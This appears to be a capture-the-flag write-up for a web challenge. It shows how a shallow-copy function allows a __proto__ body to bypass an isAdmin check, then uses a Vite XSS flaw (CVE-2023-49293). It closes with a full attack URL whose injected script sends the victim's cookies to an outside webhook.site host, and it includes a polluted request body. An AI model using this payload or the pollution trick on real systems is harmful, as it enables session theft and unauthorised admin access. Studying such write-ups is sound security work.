web/armoured-notes

Combining prototype pollution with Cross-Site Scripting (XSS) through the recently discovered Vite vulnerability CVE-2023-49293 lets us steal the admin bot's cookies.

Basic overview

We have a login page. Checking the server's login logic:

app.post("/create", async (req, res, next) => {
  // Copy of the body with the "isAdmin" key stripped (see duplicate below)
  let obj = duplicate(req.body);

  if (obj.uname === "admin" && obj.pass == process.env.PASSWORD) {
    obj.isAdmin = true;
  }
  // Ordinary property lookup: an inherited isAdmin is accepted too
  if (obj.isAdmin) {
    const newEntry = req.body;

    try {
      const result = await diaryCollection.insertOne(newEntry);
      return res.json({ code: result.insertedId });
    } catch (err) {
      console.error("Failed to insert entry", err);
      return res.status(500).json({ code: "err" });
    }
  }
  return res.json({ code: "err" });
});

The request body is passed to the duplicate function; let's check it.

const escapeHtmlReplaceMap = {
  '&': ';',
  "'": ';',
  '`': ';',
  '"': ';',
  '<': ';',
  '>': ';',
  "!": ";",
  "_": ";",
  "-": ";",
  "*": ";",
  "[": ";",
  "{": ";",
  "}": ";",
  "|": ";",
  "/": ";",
  '"': ";",
  '(': ";",
  ')': ";",
}

/**
 * Only the six characters in the regex are ever replaced; the other map
 * entries are never reached.
 * @param {string} string
 * @returns {string}
 */
export function escapeHtml(string) {
  return string.replace(/[&'`"<>]/g, (match) => escapeHtmlReplaceMap[match])
}

// Shallow copy of body that drops the "isAdmin" key and nothing else
export function duplicate(body) {
  let obj = {}
  let keys = Object.keys(body);
  keys.forEach((key) => {
    if (key !== "isAdmin")
      obj[key] = body[key];
  })
  return obj;
}

The purpose of this duplicate function is to create a shallow copy of the input object (body) while excluding the "isAdmin" property from the copy.

When creating a copy of an existing object in JavaScript this way, there is a possibility of a prototype pollution vulnerability: the loop assigns obj[key] = body[key] for every key of the parsed JSON body, including the key "__proto__", and that assignment replaces the prototype of obj with whatever object the body supplies.

So when sending this request, we can put isAdmin inside __proto__ instead of at the top level; the copy no longer filters it, obj.isAdmin resolves through the prototype chain, and we get access.
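As an added example (not the challenge's own code), here is the vulnerable duplicate() beside a hardened copy, with the server's admin decision mirrored so both can be run against a JSON body that carries __proto__; PASSWORD is a constant standing in for process.env.PASSWORD.

```javascript
// Added example, not the challenge's code. The body is parsed with JSON.parse,
// as express.json() does, so "__proto__" arrives as an own enumerable key.

const PASSWORD = "correct-password"; // stand-in for process.env.PASSWORD

// Vulnerable copy (same logic as the challenge's duplicate):
// obj["__proto__"] = value runs the inherited __proto__ setter and swaps
// obj's prototype for the attacker-supplied object. Object.prototype itself
// is untouched, so the effect is confined to this one obj.
function duplicateVulnerable(body) {
  const obj = {};
  for (const key of Object.keys(body)) {
    if (key !== "isAdmin") obj[key] = body[key];
  }
  return obj;
}

// Hardened copy: a null-prototype target (no __proto__ setter to trigger),
// an explicit denylist of prototype-related keys, and defineProperty so that
// no accessor can ever run during the copy.
function duplicateSafe(body) {
  const obj = Object.create(null);
  for (const key of Object.keys(body)) {
    if (key === "isAdmin" || key === "__proto__" || key === "constructor") continue;
    Object.defineProperty(obj, key, {
      value: body[key], writable: true, enumerable: true, configurable: true,
    });
  }
  return obj;
}

// Mirror of the handler's decision: same lookup `obj.isAdmin` the server uses.
function serverDecision(copyFn, rawBody) {
  const obj = copyFn(JSON.parse(rawBody));
  if (obj.uname === "admin" && obj.pass === PASSWORD) obj.isAdmin = true;
  return obj.isAdmin === true;
}

// Constructed sample bodies: one nesting isAdmin under __proto__, one legit.
const POLLUTED_BODY = '{"uname":"guest","__proto__":{"isAdmin":true}}';
const LEGIT_BODY = '{"uname":"admin","pass":"correct-password"}';
```

With the vulnerable copy the polluted body is accepted as admin; with the hardened copy it is rejected while the legitimate login still succeeds, and a plain `{}` still has no isAdmin afterwards.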

We can go to /post/658046ca99d634eec4c73704 to edit our payload

After researching for a while, I found there was a CVE in Vite.

http://34.132.132.69:8001/posts/657dfc4055f7b8765176bfe3/?%22%3E%3C/script%3E%3Cscript%3Efetch(%27https://webhook.site/16970ec7-2980-48d2-a5b5-1697e839440c?flag=%27+btoa(document.cookie))%3C/script%3E

The last step is decoding the base64-encoded cookie that arrives at the webhook.
